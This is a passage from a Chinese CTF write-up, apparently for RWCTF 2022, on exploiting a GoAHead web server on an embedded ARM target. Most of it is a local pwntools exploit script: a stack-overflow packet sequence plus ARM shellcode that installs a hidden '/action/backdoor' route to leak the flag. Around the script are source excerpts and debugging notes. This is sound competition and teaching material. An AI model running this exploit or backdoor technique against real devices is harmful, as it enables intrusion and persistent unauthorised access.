shellcode</span></span><br><span class="line">    <span class="type">char</span>* name = <span class="built_in">websGetVar</span>(wp, key, key); <span class="comment">// websGetVar：0x600577C4</span></span><br><span class="line">    <span class="comment">// 将 flag 输出</span></span><br><span class="line">    <span class="built_in">rt_printf</span>(name); </span><br><span class="line">    <span class="comment">// send page</span></span><br><span class="line">    <span class="built_in">websSetStatus</span>(wp, <span class="number">200</span>);      <span class="comment">// websSetStatus:       0x600588C4</span></span><br><span class="line">    <span class="built_in">websWriteHeaders</span>(wp, <span class="number">-1</span>, <span class="number">0</span>); <span class="comment">// websWriteHeaders:    0x6005891C</span></span><br><span class="line">    <span class="built_in">websWriteEndHeaders</span>(wp);     <span class="comment">// websWriteEndHeaders: 0x60058D30</span></span><br><span class="line">    <span class="built_in">websWrite</span>(wp, page);         <span class="comment">// websWrite:           0x60058E2C</span></span><br><span class="line">    <span class="built_in">websDone</span>(wp);                <span class="comment">// websDone:            0x6005496C</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里返回 200 OK 数据的写法，主要参考 <a href="https://github.com/embedthis/goahead/blob/master/test/test.c#L327">goahead/blob/master/test/test.c#L327</a> 的写法：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    Implement /action/actionTest. Parse the form variables: name, address and echo back.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">actionTest</span><span class="params">(Webs *wp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  cchar   *name, *address;</span><br><span class="line"></span><br><span class="line">  name = <span class="built_in">websGetVar</span>(wp, <span class="string">&quot;name&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">  address = <span class="built_in">websGetVar</span>(wp, <span class="string">&quot;address&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">websSetStatus</span>(wp, <span class="number">200</span>);</span><br><span class="line">    <span class="built_in">websWriteHeaders</span>(wp, <span class="number">-1</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">websWriteEndHeaders</span>(wp);</span><br><span class="line">  <span class="built_in">websWrite</span>(wp, <span class="string">&quot;&lt;html&gt;&lt;body&gt;&lt;h2&gt;name: %s, address: %s&lt;/h2&gt;&lt;/body&gt;&lt;/html&gt;\n&quot;</span>, name, address);</span><br><span class="line">    <span class="built_in">websFlush</span>(wp, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">websDone</span>(wp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>执行 <code>websAddRoute(&quot;/action/backdoor&quot;, &quot;action&quot;, 0)</code>重新注册路由表。</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">websAddRoute() addr: 0x600636A0</span><br></pre></td></tr></table></figure><p>注意第三个参数为 0，由于路由表是以数组形式顺序访问，因此将 pos 设置为 0 可以<strong>将目标路由放至第一个</strong>。</p><p>踩过的坑：先前重新注册路由表，是打算先覆写 <code>route.txt</code>，再执行 <code>websLoad(&quot;route.txt&quot;)</code>。但是后来阅读源码，发现这样做太过于麻烦：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">    Load route and authentication configuration files</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">PUBLIC <span class="type">int</span> <span class="title">websLoad</span><span class="params">(cchar *path)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ...</span><br><span class="line">        </span><br><span class="line">    <span class="keyword">for</span> (line = <span class="built_in">stok</span>(buf, <span class="string">&quot;\r\n&quot;</span>, &amp;token); line; line = <span class="built_in">stok</span>(<span class="literal">NULL</span>, <span class="string">&quot;\r\n&quot;</span>, &amp;token)) &#123;</span><br><span class="line">        kind = <span class="built_in">stok</span>(line, <span class="string">&quot; \t&quot;</span>, &amp;next);</span><br><span class="line">        ...</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">smatch</span>(kind, <span class="string">&quot;route&quot;</span>)) &#123;</span><br><span class="line">            auth = dir = handler = protocol = uri = <span class="number">0</span>;</span><br><span class="line">            abilities = extensions = methods = redirects = <span class="number">-1</span>;</span><br><span class="line">            <span class="keyword">while</span> ((option = <span class="built_in">stok</span>(<span class="literal">NULL</span>, <span class="string">&quot; \t\r\n&quot;</span>, &amp;next)) != <span class="number">0</span>) &#123;</span><br><span class="line">                key = <span class="built_in">stok</span>(option, <span class="string">&quot;=&quot;</span>, &amp;value);</span><br><span class="line">                <span class="keyword">if</span> ...</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;handler&quot;</span>)) &#123;</span><br><span class="line">                    handler = value;</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;methods&quot;</span>)) &#123;</span><br><span class="line">                    <span class="built_in">addOption</span>(&amp;methods, value, <span class="number">0</span>);</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;redirect&quot;</span>)) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (<span class="built_in">strchr</span>(value, <span class="string">&#x27;@&#x27;</span>)) &#123;</span><br><span class="line">                        status = <span class="built_in">stok</span>(value, <span class="string">&quot;@&quot;</span>, &amp;redirectUri);</span><br><span class="line">                        <span class="keyword">if</span> (<span class="built_in">smatch</span>(status, <span class="string">&quot;*&quot;</span>)) &#123;</span><br><span class="line">                            status = <span class="string">&quot;0&quot;</span>;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        status = <span class="string">&quot;0&quot;</span>;</span><br><span class="line">                        redirectUri = value;</span><br><span class="line">                    &#125;</span><br><span class="line">                    ...</span><br><span class="line">                &#125; ...</span><br><span class="line">                &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">smatch</span>(key, <span class="string">&quot;uri&quot;</span>)) &#123;</span><br><span class="line">                    uri = value;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="built_in">error</span>(<span class="string">&quot;Bad route keyword %s&quot;</span>, key);</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> ((route = <span class="built_in">websAddRoute</span>(uri, handler, <span class="number">-1</span>)) == <span class="number">0</span>) &#123;</span><br><span class="line">                rc = <span class="number">-1</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">websSetRouteMatch</span>(route, dir, protocol, methods, extensions, abilities, redirects);</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> ME_GOAHEAD_AUTH</span></span><br><span class="line">            <span class="keyword">if</span> (auth &amp;&amp; <span class="built_in">websSetRouteAuth</span>(route, auth) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">                rc = <span class="number">-1</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; ...</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">    <span class="keyword">return</span> rc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>通读源码可以看到，我们只需执行 <code>websAddRoute(&quot;/action/backdoor&quot;, &quot;action&quot;, 0)</code> ，即可成功将 backdoor 路由注册进路由表中。而且还可以指定第三个参数，将 backdoor 路由放置进路由表的最前端。</p><p>默认情况下 route 的其他字段为 -1，因此 route 中的 dir、protocol、methods 等不会参与路由匹配。所以下面那个 <code>websSetRouteMatch</code> 函数我们可以不用手动执行。</p></li></ul><h3 id="d-遇到的其他坑点">d. 遇到的其他坑点</h3><p>继续写 exp 时遇到了一些问题：</p><ul><li><p>submit 的 shellcode 会被 GoAHead 进行 URL 编码：</p><p><img src="/2022/01/rwctf2022_flag/image-20220130113744939.png" alt="image-20220130113744939"></p><p>因此在发送 submit 请求时，需要加上 HTTP header 显式告知 GoAHead 无需编码：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">&quot;Content-Type&quot;</span><span class="punctuation">:</span><span class="string">&quot;application/x-www-form-urlencoded&quot;</span></span><br></pre></td></tr></table></figure><p>需要注意的是，既然都标上这个了，发送的 data 就<strong>不能是 json</strong> 了（即不能发送 <code>&#123;'word': shellcode&#125;</code>），因为这还是会让远程忽略该 header 进行 URL 编码。</p></li><li><p>pwntools 编码 shellcode 时报错：<code>pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType(arch = 'arm', bits = 32, encoding = 'latin', endian = 'little', log_level = 10, os = 'linux')</code></p><p>这是因为我的机器上没有安装 ARM 编译相关的环境等等，执行以下命令安装即可：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install binutils-arm-linux-gnueabi</span><br></pre></td></tr></table></figure></li><li><p>gdb pwndbg 中， <code>p/x $fp</code> 显示的是 <code>$sp</code> 的值，但实际上 <code>$fp</code> 和 <code>$r11</code> 是同一个寄存器，有点奇怪，可能是 gdb bug。</p></li><li><p>若出现以下情况，则需要<strong>重启 linux（重启 qemu 已经没用了）</strong>，或者直接进 docker 中调试：</p><ul><li><p>gdb find 出来的 <strong>shellcode 地址不固定</strong></p></li><li><p><strong>每次</strong>执行时栈溢出所在栈上数据，有<strong>好几个指针的值</strong>每次都不同</p><blockquote><p>根据本人调试，<strong>每次</strong>栈上数据最多只会有<strong>一个非指针值</strong>发生改变，并且不影响程序执行。</p></blockquote></li></ul></li></ul><h3 id="e-本地-exploit">e. 本地 exploit</h3><blockquote><p>没试过远程，因为远程关了…</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">context(</span><br><span class="line">    arch=<span class="string">&#x27;arm&#x27;</span>,</span><br><span class="line">    bits=<span class="number">32</span>,</span><br><span class="line">    encoding=<span class="string">&#x27;latin&#x27;</span>,</span><br><span class="line">    log_level=<span class="string">&quot;info&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">baseURL = <span class="string">&quot;http://localhost:5555&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_session</span>():</span><br><span class="line">    session = requests.session()</span><br><span class="line">    login_data = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: <span class="string">&quot;admin&quot;</span>&#125;</span><br><span class="line">    res = session.post(url=baseURL+<span class="string">&quot;/action/login&quot;</span>, data=login_data)</span><br><span class="line">    <span class="keyword">assert</span> res.status_code == <span class="number">200</span></span><br><span class="line">    <span class="keyword">return</span> session</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">submit_msg</span>(<span class="params">session, msg</span>):</span><br><span class="line">    <span class="comment"># submit_data = msg # &#123;&quot;word&quot;: msg&#125;</span></span><br><span class="line">    </span><br><span class="line">    res = session.post(</span><br><span class="line">        url=baseURL+<span class="string">&quot;/action/submit&quot;</span>, </span><br><span class="line">        headers=&#123; <span class="string">&quot;Content-Type&quot;</span>:<span class="string">&quot;application/x-www-form-urlencoded&quot;</span> &#125;,</span><br><span class="line">        data=msg)</span><br><span class="line">    <span class="keyword">assert</span> res.status_code == <span class="number">200</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># def get_last_submit_msg(session):</span></span><br><span class="line"><span class="comment">#     res = session.get(url=baseURL+&quot;/submit.jst&quot;)</span></span><br><span class="line"><span class="comment">#     assert res.status_code == 200</span></span><br><span class="line"><span class="comment">#     return res.content</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">execute_shellcode</span>(<span class="params">shellcode_addr=<span class="number">0x6004cb30</span></span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">send_packet</span>(<span class="params">packet_len, data=<span class="string">b&#x27;&#x27;</span></span>):</span><br><span class="line">        p = remote(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">5555</span>)</span><br><span class="line">        remain_len = packet_len - <span class="built_in">len</span>(data)</span><br><span class="line">        <span class="keyword">assert</span> remain_len &gt;= <span class="number">0</span></span><br><span class="line">        p.send(data + <span class="string">b&quot;*&quot;</span> * remain_len)</span><br><span class="line">        p.close()</span><br><span class="line">        time.sleep(<span class="number">0.3</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> ch <span class="keyword">in</span> <span class="string">&quot;backdoor&quot;</span>: <span class="comment"># \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72</span></span><br><span class="line">        send_packet(<span class="built_in">ord</span>(ch) - <span class="number">0x3a</span>)</span><br><span class="line">    send_packet(<span class="number">0x202</span> - <span class="number">0x3a</span>, flat(</span><br><span class="line">        <span class="string">&quot;-&quot;</span>*<span class="number">0xa</span>,</span><br><span class="line">        <span class="number">0x6b636162</span>,      <span class="number">0x726f6f64</span>,      <span class="number">0x60e4297c</span>,      <span class="number">0x00000202</span>,</span><br><span class="line">        <span class="number">0x02020000</span>,      <span class="number">0x609a4208</span>,      <span class="number">0x61cd29f8</span>,      <span class="number">0xffffffff</span>,</span><br><span class="line">        <span class="number">0x61cd27e4</span>,      <span class="number">0x60e52d58</span>,      <span class="number">0x04040404</span>,      <span class="number">0x60e429d4</span>,</span><br><span class="line">        shellcode_addr,  <span class="number">0x06060606</span>,      <span class="number">0x00000000</span>,      <span class="number">0x08080808</span>,</span><br><span class="line">        <span class="number">0x609a4208</span>,      <span class="number">0x61cd278c</span>,      <span class="number">0x6000001f</span>,      <span class="number">0x00000001</span>,</span><br><span class="line">        <span class="number">0x2000001f</span>,      <span class="number">0x11111111</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x80000068</span>,      <span class="number">0x60e428e8</span>,      <span class="number">0x00000000</span>,      <span class="number">0x60e52cf4</span>,</span><br><span class="line">        <span class="number">0x609a40e4</span>,      <span class="number">0x60e429f0</span>,      <span class="number">0x609a40dc</span>,      <span class="number">0x00000001</span>,</span><br><span class="line">        <span class="number">0x60e3a994</span>,      <span class="number">0x60e3a994</span>,      <span class="number">0x60e429f0</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000006</span>,      <span class="number">0x60e3a9e8</span>,      <span class="number">0x00787265</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000005</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000006</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x0000007e</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x80000080</span>,      <span class="number">0x60e42aac</span>,</span><br><span class="line">        <span class="number">0x60e42ac0</span>,      <span class="number">0x60e42acc</span>,      <span class="number">0x60e42abc</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x60e42a70</span>,      <span class="number">0xffffffff</span>,      <span class="number">0x60e42a70</span>,      <span class="number">0x60e42a70</span>,</span><br><span class="line">        <span class="number">0x00000001</span>,      <span class="number">0x60e42a84</span>,      <span class="number">0xffffffff</span>,      <span class="number">0x60e4aaf8</span>,</span><br><span class="line">        <span class="number">0x60e4aaf8</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000008</span>,      <span class="number">0x00000004</span>,</span><br><span class="line">        <span class="number">0x0000ffff</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,</span><br><span class="line">        <span class="number">0x60e52bc4</span>,      <span class="number">0x60e52a9c</span>,      <span class="number">0x60e52ab4</span>,      <span class="number">0x60e72954</span>,</span><br><span class="line">        <span class="number">0x60e52a9c</span>,      <span class="number">0x60e52a9c</span>,      <span class="number">0x60e52ab4</span>,      <span class="number">0x60e72954</span>,</span><br><span class="line">        <span class="number">0x00000000</span>,      <span class="number">0x00000000</span>,      <span class="number">0x80008008</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,</span><br><span class="line">        <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="number">0xa5a5a5a5</span>,      <span class="string">&quot;\xa5\xa5&quot;</span>,</span><br><span class="line">    ))</span><br><span class="line"></span><br><span class="line">shellcode_addr = <span class="number">0x60d9c588</span></span><br><span class="line">sc_bytecode = asm(vma=shellcode_addr, shellcode=<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    // save all registers</span></span><br><span class="line"><span class="string">    push &#123;r0-r11&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // memcpy handler to /log_err.html + 0x200</span></span><br><span class="line"><span class="string">    ldr r0, =0x606D3aD0 </span></span><br><span class="line"><span class="string">    ldr r1, =backdoor_handler </span></span><br><span class="line"><span class="string">    ldr r2, =0x200         </span></span><br><span class="line"><span class="string">    ldr r3, =0x60021704 </span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // call websDefineAction(&quot;backdoor&quot;, backdoor_handler)</span></span><br><span class="line"><span class="string">    ldr r0, =backdoor     </span></span><br><span class="line"><span class="string">    ldr r1, =0x606D3aD0   </span></span><br><span class="line"><span class="string">    ldr r3, =0x6004D28C   </span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // rt_printf status</span></span><br><span class="line"><span class="string">    mov r1, r0</span></span><br><span class="line"><span class="string">    ldr r0, =rt_printf_fmt</span></span><br><span class="line"><span class="string">    ldr r3, =0x6002111C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websAddRoute(&quot;/action/backdoor&quot;, &quot;action&quot;, 0)</span></span><br><span class="line"><span class="string">    ldr r0, =route_path</span></span><br><span class="line"><span class="string">    ldr r1, =route_handler</span></span><br><span class="line"><span class="string">    mov r2, 0</span></span><br><span class="line"><span class="string">    ldr r3, =0x600636A0</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // pop all registers</span></span><br><span class="line"><span class="string">    pop &#123;r0-r11&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // return to origin</span></span><br><span class="line"><span class="string">    ldr pc, =0x6004cb30</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">/* ----------- backdoor_handler ----------- */</span></span><br><span class="line"><span class="string">backdoor_handler:</span></span><br><span class="line"><span class="string">    push &#123;r1-r11, lr&#125;</span></span><br><span class="line"><span class="string">    push &#123;r0&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // char* name = websGetVar(wp, key, key);</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =flag</span></span><br><span class="line"><span class="string">    ldr r2, =flag</span></span><br><span class="line"><span class="string">    ldr r3, =0x600577C4</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // memcpy to 404 data</span></span><br><span class="line"><span class="string">    mov r1, r0</span></span><br><span class="line"><span class="string">    ldr r0, =0x60076824</span></span><br><span class="line"><span class="string">    // ldr r1, =success_page  </span></span><br><span class="line"><span class="string">    ldr r2, =23          </span></span><br><span class="line"><span class="string">    ldr r3, =0x60021704</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websSetStatus(wp, 200)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =200</span></span><br><span class="line"><span class="string">    ldr r3, =0x600588C4</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websWriteHeaders(wp, -1, 0)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =-1</span></span><br><span class="line"><span class="string">    ldr r2, =0</span></span><br><span class="line"><span class="string">    ldr r3, =0x6005891C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websWriteEndHeaders(wp)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r3, =0x60058D30</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websWrite(wp, page)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r1, =success_page</span></span><br><span class="line"><span class="string">    ldr r3, =0x60058E2C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    // websDone(wp)</span></span><br><span class="line"><span class="string">    ldr r0, [sp]</span></span><br><span class="line"><span class="string">    ldr r3, =0x6005496C</span></span><br><span class="line"><span class="string">    BL call</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    pop &#123;r0&#125;</span></span><br><span class="line"><span class="string">    pop &#123;r1-r11, pc&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">call: // 手动实现 call r3</span></span><br><span class="line"><span class="string">    push &#123;lr&#125;</span></span><br><span class="line"><span class="string">    mov lr, pc</span></span><br><span class="line"><span class="string">    add lr, lr, 4</span></span><br><span class="line"><span class="string">    mov pc, r3 </span></span><br><span class="line"><span class="string">    pop &#123;pc&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">flag:           .asciz  &quot;flag&quot;</span></span><br><span class="line"><span class="string">backdoor:       .asciz  &quot;backdoor&quot;</span></span><br><span class="line"><span class="string">success_page:   .asciz  &quot;&#123;\\&quot;status\\&quot; : \\&quot;success\\&quot;&#125;&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">route_path:     .asciz  &quot;/action/backdoor&quot;</span></span><br><span class="line"><span class="string">route_handler:  .asciz  